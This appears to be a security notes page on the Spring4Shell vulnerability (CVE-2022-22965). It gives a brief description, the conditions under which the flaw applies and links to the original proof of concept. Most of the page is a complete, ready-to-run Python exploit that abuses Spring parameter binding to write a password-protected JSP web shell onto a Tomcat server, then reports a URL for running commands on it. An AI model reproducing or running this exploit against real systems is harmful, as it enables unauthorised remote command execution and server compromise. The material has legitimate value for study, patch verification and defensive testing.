๐Ÿƒ
Spring4Shell
An open source foundation for Java and with JDK9+. Attackers could gain access to the AccessLogValve object through parameter binding features and use field values to trigger the pipeline mechanism, which can write to a file in an arbitrary path under specific conditions.
Conditions:
  • JDK 9.0+
  • Spring framework/derivative framework spring-beans-*.jar exists
Exploit:
1
#!/usr/bin/env python3
2
# Spring4Shell Exploit
3
# Original Exploit: https://github.com/BobTheShoplifter/Spring4Shell-POC/
4
# Modified by: AG | MuirlandOracle
5
โ€‹
6
import requests
7
import argparse
8
from urllib.parse import urljoin
9
โ€‹
10
def exploit(url, filename, password, directory):
11
headers = {"suffix":"%><!--//",
12
"c1":"Runtime",
13
"c2":"<%",
14
"DNT":"1",
15
"Content-Type":"application/x-www-form-urlencoded"
16
}
17
โ€‹
18
data = f"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22{password}%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/{directory}&class.module.classLoader.resources.context.parent.pipeline.first.prefix={filename}&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
19
โ€‹
20
โ€‹
21
try:
22
requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
23
shellurl = urljoin(url, f"{filename}.jsp")
24
shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
25
if shellgo.status_code == 200:
26
print(f"Shell Uploaded Successfully!\nYour shell can be found at: {shellurl}?pwd={password}&cmd=whoami")
27
else:
28
print("Exploit failed to upload")
29
except Exception as e:
30
print(e)
31
pass
32
โ€‹
33
โ€‹
34
โ€‹
35
โ€‹
36
if __name__ == '__main__':
37
parser = argparse.ArgumentParser(description='Spring4Shell RCE Proof of Concept')
38
parser.add_argument('url', help='Target URL')
39
parser.add_argument("-f","--filename", help="Name of the file to upload (Default tomcatwar.jsp)", default="tomcatwar.jsp")
40
parser.add_argument("-p","--password", help="Password to protect the shell with (Default: thm)", default="thm")
41
parser.add_argument("-d","--directory", help="The upload path for the file (Default: ROOT)", default="ROOT")
42
args = parser.parse_args()
43
exploit(args.url, args.filename.split(".")[0], args.password, args.directory)
Copied!
Resources:
GitHub - BobTheShoplifter/Spring4Shell-POC: Spring4Shell Proof Of Concept/Information CVE-2022-22965
GitHub
POC
Spring Framework RCE, Early Announcement
springcentral
Announcement w/Information
find . -name spring-beans*.jar
โ€‹
Copy link